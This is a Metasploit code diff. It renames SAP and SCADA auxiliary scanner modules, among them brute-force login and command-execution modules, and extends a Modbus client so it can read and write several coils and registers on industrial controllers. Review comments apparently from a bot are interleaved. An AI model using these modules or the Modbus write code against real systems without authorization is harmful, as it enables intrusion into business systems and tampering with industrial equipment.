@@ -196,7 +196,7 @@ class Metasploit3 < Msf::Auxiliary rsync_negotiate module_metadata[:authentication] = get_rsync_auth_status(module_metadata[:name]) rescue *HANDLED_EXCEPTIONS => e - vprint_error("#{peer} - error while testing authentication on #{module_metadata[:name]}: #{e}") + vprint_error("error while testing authentication on #{module_metadata[:name]}: #{e}") break ensure disconnect diff --git a/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb b/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb index 3bff4eaa56..b93b5dd456 100644 --- a/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb +++ b/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem.rb b/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem.rb index 7865397e71..5acb133b6b 100644 --- a/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem.rb +++ b/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_icf_public_info.rb b/modules/auxiliary/scanner/sap/sap_icf_public_info.rb index 05ca2b7f4c..146a919d95 100644 --- a/modules/auxiliary/scanner/sap/sap_icf_public_info.rb +++ b/modules/auxiliary/scanner/sap/sap_icf_public_info.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report 
diff --git a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb index 7cea619121..1e9e63aa2e 100644 --- a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb +++ b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb index f87e2d65f3..3a300ad761 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb index b7543c4122..114d6758d9 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -95,7 +95,7 @@ class Metasploit4 < Msf::Auxiliary pass = pass.gsub("", datastore["SAP_SID"]) end - print_status("#{peer} - Trying username:'#{user}' password:'#{pass}'") + print_status("Trying username:'#{user}' password:'#{pass}'") success = false soapenv = 'http://schemas.xmlsoap.org/soap/envelope/' diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb index b1d033363b..fb3a9571bb 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb 
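Review bot: In sap_mgmt_con_brute_login.rb, `print_status("Trying username:'#{user}' password:'#{pass}'")` runs once per attempt at normal verbosity, so a run writes every candidate password to the console and to any spool or log that captures it. `vprint_status("Trying username:'#{user}' password:'#{pass}'")` keeps the line available for debugging without putting the whole wordlist in default output. The enclosing method starts and ends outside the hunk.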
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb index 1333c69ff8..ee9957196f 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb index 15868dd886..7d4b52b594 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb index ccf26867ad..0081f81978 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocesslist.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocesslist.rb index d48d7dfd8b..6747e7263c 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocesslist.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocesslist.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb index a6027450f4..3f4cc9ebf3 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb index bb443cf0b6..76ab9d2360 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb index f950718dba..d1d26c469f 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb index 43a943d552..27e3600b01 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb index 34c51c9eba..5f835712b5 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_router_info_request.rb b/modules/auxiliary/scanner/sap/sap_router_info_request.rb index c87f04e5b8..1edd8fdae9 100644 --- a/modules/auxiliary/scanner/sap/sap_router_info_request.rb +++ b/modules/auxiliary/scanner/sap/sap_router_info_request.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_router_portscanner.rb b/modules/auxiliary/scanner/sap/sap_router_portscanner.rb index 79f9882999..d22432a080 100644 --- a/modules/auxiliary/scanner/sap/sap_router_portscanner.rb +++ b/modules/auxiliary/scanner/sap/sap_router_portscanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_service_discovery.rb b/modules/auxiliary/scanner/sap/sap_service_discovery.rb index fa77142694..47921cdf7d 100644 --- a/modules/auxiliary/scanner/sap/sap_service_discovery.rb +++ b/modules/auxiliary/scanner/sap/sap_service_discovery.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_smb_relay.rb b/modules/auxiliary/scanner/sap/sap_smb_relay.rb index 3c832996bf..fb43861d0c 100644 --- a/modules/auxiliary/scanner/sap/sap_smb_relay.rb +++ b/modules/auxiliary/scanner/sap/sap_smb_relay.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb b/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb index 1ae343ea5b..72033622a3 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb index 1febb6b023..f170841f30 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb index cd8e52f1ee..fe280f2599 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb 
@@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb index 05bbe78ec4..567db4db73 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing.rb index 1658e8688d..3946cdc795 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence.rb index 1547c002aa..2a5dc93882 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner 
diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb index 95a48c4de8..f8572c005c 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb index f699e19db8..d7ee3ed5a9 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir.rb index e751c8e3cb..4a78406fc9 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir.rb @@ -23,7 +23,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb index 833901c516..21c1d4caba 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb 
@@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb index 0091f41be4..6946dff925 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb index 0480f0b23d..1302852087 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb index 5cfe258ca9..7069c66c5b 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb b/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb index a9400633cf..f7233c60d9 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb 
+++ b/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb @@ -16,7 +16,7 @@ require "msf/core" -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb b/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb index ebac99fd8b..a97e65fda8 100644 --- a/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb +++ b/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/scada/digi_addp_reboot.rb b/modules/auxiliary/scanner/scada/digi_addp_reboot.rb index a93c3dfafe..10c13f6ba1 100644 --- a/modules/auxiliary/scanner/scada/digi_addp_reboot.rb +++ b/modules/auxiliary/scanner/scada/digi_addp_reboot.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/addp' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/scada/digi_addp_version.rb b/modules/auxiliary/scanner/scada/digi_addp_version.rb index 3de56d9a43..25d2ccffaa 100644 --- a/modules/auxiliary/scanner/scada/digi_addp_version.rb +++ b/modules/auxiliary/scanner/scada/digi_addp_version.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/addp' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/scada/digi_realport_serialport_scan.rb b/modules/auxiliary/scanner/scada/digi_realport_serialport_scan.rb index 0838eae12e..1893540379 100644 --- a/modules/auxiliary/scanner/scada/digi_realport_serialport_scan.rb 
+++ b/modules/auxiliary/scanner/scada/digi_realport_serialport_scan.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::RealPort include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/scada/digi_realport_version.rb b/modules/auxiliary/scanner/scada/digi_realport_version.rb index b0a9ea2d1c..eb6c6aad89 100644 --- a/modules/auxiliary/scanner/scada/digi_realport_version.rb +++ b/modules/auxiliary/scanner/scada/digi_realport_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::RealPort include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess.rb b/modules/auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess.rb index 6b8acd99f2..ab3545a5bf 100644 --- a/modules/auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess.rb +++ b/modules/auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/scada/koyo_login.rb b/modules/auxiliary/scanner/scada/koyo_login.rb index ecf1f50a29..83e248ba52 100644 --- a/modules/auxiliary/scanner/scada/koyo_login.rb +++ b/modules/auxiliary/scanner/scada/koyo_login.rb @@ -8,7 +8,7 @@ require 'msf/core' # msfdev is going to want a bunch of other stuff for style/compat but this works # TODO: Make into a real AuthBrute module, although the password pattern is fixed -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/scada/modbus_findunitid.rb b/modules/auxiliary/scanner/scada/modbus_findunitid.rb index d570f4281b..b58a0fe30c 100644 
--- a/modules/auxiliary/scanner/scada/modbus_findunitid.rb +++ b/modules/auxiliary/scanner/scada/modbus_findunitid.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/scanner/scada/modbusclient.rb b/modules/auxiliary/scanner/scada/modbusclient.rb index 70b5242414..325de27a11 100644 --- a/modules/auxiliary/scanner/scada/modbusclient.rb +++ b/modules/auxiliary/scanner/scada/modbusclient.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp 
@@ -20,24 +20,31 @@ class Metasploit3 < Msf::Auxiliary 'Author' => [ 'EsMnemon ', # original write-only module - 'Arnaud SOULLIE ' # new code that allows read/write + 'Arnaud SOULLIE ', # code that allows read/write + 'Alexandrine TORRENTS ', # code that allows reading/writing at multiple consecutive addresses + 'Mathieu CHEVALIER ' ], 'License' => MSF_LICENSE, 'Actions' => [ - ['READ_COIL', { 'Description' => 'Read one bit from a coil' } ], + ['READ_COILS', { 'Description' => 'Read bits from several coils' } ], + ['READ_REGISTERS', { 'Description' => 'Read words from several registers' } ], ['WRITE_COIL', { 'Description' => 'Write one bit to a coil' } ], - ['READ_REGISTER', { 'Description' => 'Read one word from a register' } ], - ['WRITE_REGISTER', { 'Description' => 'Write one word to a register' } ] + ['WRITE_REGISTER', { 'Description' => 'Write one word to a register' } ], + ['WRITE_COILS', { 'Description' => 'Write bits to several coils' } ], + ['WRITE_REGISTERS', { 'Description' => 'Write words to several registers' } ] ], - 'DefaultAction' => 'READ_REGISTER' + 'DefaultAction' => 'READ_REGISTERS' )) register_options( [ Opt::RPORT(502), - OptInt.new('DATA', [false, "Data to write (WRITE_COIL and WRITE_REGISTER modes only)"]), OptInt.new('DATA_ADDRESS', [true, "Modbus data address"]), + OptInt.new('NUMBER', [false, "Number of coils/registers to read (READ_COILS ans READ_REGISTERS modes only)", 1]), + OptInt.new('DATA', [false, "Data to write (WRITE_COIL and WRITE_REGISTER modes only)"]), + OptString.new('DATA_COILS', [false, "Data in binary to write (WRITE_COILS mode only) e.g. 0110"]), + OptString.new('DATA_REGISTERS', [false, "Words to write to each register separated with a comma (WRITE_REGISTERS mode only) e.g. 1,2,3,4"]), OptInt.new('UNIT_NUMBER', [false, "Modbus unit number", 1]), ], self.class) 
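Review bot: The description of the new `NUMBER` option contains a typo (`ans`) and does not say which values are accepted, even though the read handlers added later in this diff only reject a sum with DATA_ADDRESS above 65535. I would write it as `OptInt.new('NUMBER', [false, "Number of coils/registers to read (READ_COILS and READ_REGISTERS modes only)", 1]),` and add the accepted range to the text. The new `'Mathieu CHEVALIER '` author entry is also the only one without a trailing comment saying what was contributed.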
@@ -63,7 +70,7 @@ class Metasploit3 < Msf::Auxiliary payload = [datastore['UNIT_NUMBER']].pack("c") payload += [@function_code].pack("c") payload += [datastore['DATA_ADDRESS']].pack("n") - payload += [1].pack("n") + payload += [datastore['NUMBER']].pack("n") make_payload(payload) end @@ -79,6 +86,21 @@ class Metasploit3 < Msf::Auxiliary packet_data end + def make_write_coils_payload(data, byte) + payload = [datastore['UNIT_NUMBER']].pack("c") + payload += [@function_code].pack("c") + payload += [datastore['DATA_ADDRESS']].pack("n") + payload += [datastore['DATA_COILS'].size].pack("n") # bit count + payload += [byte].pack("c") # byte count + for i in 0..(byte-1) + payload += [data[i]].pack("b*") + end + + packet_data = make_payload(payload) + + packet_data + end + def make_write_register_payload(data) payload = [datastore['UNIT_NUMBER']].pack("c") payload += [@function_code].pack("c") @@ -88,6 +110,19 @@ class Metasploit3 < Msf::Auxiliary make_payload(payload) end + def make_write_registers_payload(data, size) + payload = [datastore['UNIT_NUMBER']].pack("c") + payload += [@function_code].pack("c") + payload += [datastore['DATA_ADDRESS']].pack("n") + payload += [size].pack("n") # word count + payload += [2*size].pack("c") # byte count + for i in 0..(size-1) + payload += [data[i]].pack("n") + end + + make_payload(payload) + end + def handle_error(response) case response.reverse.unpack("c")[0].to_i when 1 
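Review bot: `payload += [datastore['NUMBER']].pack("n")` packs whatever integer the operator set, and nothing visible in this diff rejects zero or negative values; the read handlers only test the upper bound. A lower-bound check before the frame is built, for example `if datastore['NUMBER'] < 1` followed by `print_error("NUMBER must be at least 1")` and `return`, would keep a meaningless quantity from being sent to the device. The enclosing method starts outside this hunk, so whether it has other callers is not visible here.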
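Review bot: `payload += [byte].pack("c") # byte count` stores the count in one signed byte, while `write_coils` later in this diff accepts DATA_COILS strings of up to 65535 characters, so a long input produces a count field that no longer matches the data that follows (Ruby's `pack` keeps only the low 8 bits, as far as I know, rather than raising). The same applies to `payload += [2*size].pack("c") # byte count` in `make_write_registers_payload` in the next hunk. I would use `pack("C")` in both places and have the callers reject inputs whose byte count does not fit in that field before anything is written to the device. Two smaller style points in the same method: `for i in 0..(byte-1)` reads better as `data.each { |chunk| payload += [chunk].pack("b*") }`, and `packet_data = make_payload(payload)` followed by a bare `packet_data` can be just `make_payload(payload)`.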
@@ -106,34 +141,57 @@ class Metasploit3 < Msf::Auxiliary return end - def read_coil + def read_coils + if datastore['NUMBER']+datastore['DATA_ADDRESS'] > 65535 + print_error("Coils addresses go from 0 to 65535. You cannot go beyond.") + return + end @function_code = 0x1 - print_status("Sending READ COIL...") + print_status("Sending READ COILS...") response = send_frame(make_read_payload) + values = [] if response.nil? - print_error("No answer for the READ COIL") + print_error("No answer for the READ COILS") return elsif response.unpack("C*")[7] == (0x80 | @function_code) handle_error(response) elsif response.unpack("C*")[7] == @function_code - value = response[9].unpack("c")[0] - print_good("Coil value at address #{datastore['DATA_ADDRESS']} : #{value}") + loop = (datastore['NUMBER']-1)/8 + for i in 0..loop + bin_value = response[9+i].unpack("b*")[0] + list = bin_value.split("") + for j in 0..7 + list[j] = list[j].to_i + values[i*8 + j] = list[j] + end + end + values = values[0..(datastore['NUMBER']-1)] + print_good("#{datastore['NUMBER']} coil values from address #{datastore['DATA_ADDRESS']} : ") + print_good("#{values}") else print_error("Unknown answer") end end - def read_register + def read_registers + if datastore['NUMBER']+datastore['DATA_ADDRESS'] > 65535 + print_error("Registers addresses go from 0 to 65535. You cannot go beyond.") + return + end @function_code = 3 - print_status("Sending READ REGISTER...") + print_status("Sending READ REGISTERS...") response = send_frame(make_read_payload) + values = [] if response.nil? 
